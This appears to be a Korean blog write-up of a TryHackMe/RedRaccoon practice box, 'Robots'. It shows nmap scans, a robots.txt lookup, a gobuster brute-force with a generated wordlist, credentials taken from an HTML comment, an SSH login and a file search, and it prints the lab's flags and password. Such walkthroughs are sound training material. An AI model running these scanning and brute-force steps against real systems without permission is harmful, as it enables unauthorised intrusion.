Oh! JUN
[redraccoon] ## Robots ## 본문
TryHackMe | 모의해킹 기초
레드라쿤 모의해킹 기초 실습방
tryhackme.com
[Robots]
# Stealth, thread 4로 정보 수집
sudo nmap 10.10.124.31 -sS -T4
sudo nmap 10.10.124.31 -sV -T4 -sC -p 22,80
# -sV : 서비스 버전 확인
# -sC : 기본 스크립트 실행
---------------------
PORT STATE SERVICE
---------------------
22/tcp open ssh
80/tcp open http
---------------------
# 웹 사이트 실행
http://10.10.124.31:80
# robots.txt 검색
http://10.10.124.31:80/robots.txt
------------------------
User-agent: *
Allow: /index.php
Disallow: /admin.html
------------------------
# admin.html 검색
http://10.10.124.31:80/admin.html
----------------------------------------------------
Admin Page
To find the real admin page,
look for a XXXX.hv.html file in this web server,
where XXXX is a 4-digit number.
----------------------------------------------------
# 0~9999.hv.html의 wordlist 제작
for i in {0000..9999} ; do echo $i.hv.html >> wordlist.txt; done
# wordlist 사용해서 http://10.10.124.31의 디렉터리 브루트포싱 실행
gobuster dir -u http://10.10.124.31 -w wordlist.txt -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.124.31
[+] Method: GET
[+] Threads: 100
[+] Wordlist: wordlist.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/7289.hv.html (Status: 200) [Size: 653]
Progress: 10000 / 10001 (99.99%)
===============================================================
Finished
===============================================================
# http://10.10.124.31/7289.hv.html 실행 및 페이지 소스코드 보기
-----------------------------------
# username : password
<!-- secret:HV-NOPERS-1337!! -->
# flag
<!-- GROOT{WH4T_S3CRETS_LUL} -->
-----------------------------------
# 알아낸 id와 pw로 ssh 접속하기
ssh secret@10.10.124.31
# 리스트 확인
$ ls -alh
-----------------------------------------------------------
-rwxrwxrwx 1 root root 88 Mar 11 2023 .roothint.lmao
-----------------------------------------------------------
# hint 파일 확인하기
$ cat .roothint.lmao
-------------------------------------------------------------------
how did you get in here? Bet you won't find the secret file though. < secrets.txt >
-------------------------------------------------------------------
# 'secrets.txt'파일을 찾는 과정에서 발생하는 오류는 null 처리
$ find / -name "secrets.txt" 2>/dev/null
--------------------------
/etc/apache2/secrets.txt
--------------------------
$ cat /etc/apache2/secrets.txt
------------------------------------------------------
GROOT{WELCOME_TO_THE_HONEYPOT_WE_ARE_GOING_TO_GET_YOU}
------------------------------------------------------'문제풀이 > Redraccoon' 카테고리의 다른 글
| [redraccoon] ## rootme ## (1) | 2024.02.07 |
|---|---|
| [redraccoon] ## Catch me if you can ## (1) | 2024.02.06 |
| [redraccoon] ## RemoteWebAdm ## (0) | 2024.02.06 |
| [redraccoon] rcity22 :Morse, steganography (0) | 2024.02.05 |
'문제풀이/Redraccoon' Related Articles
more
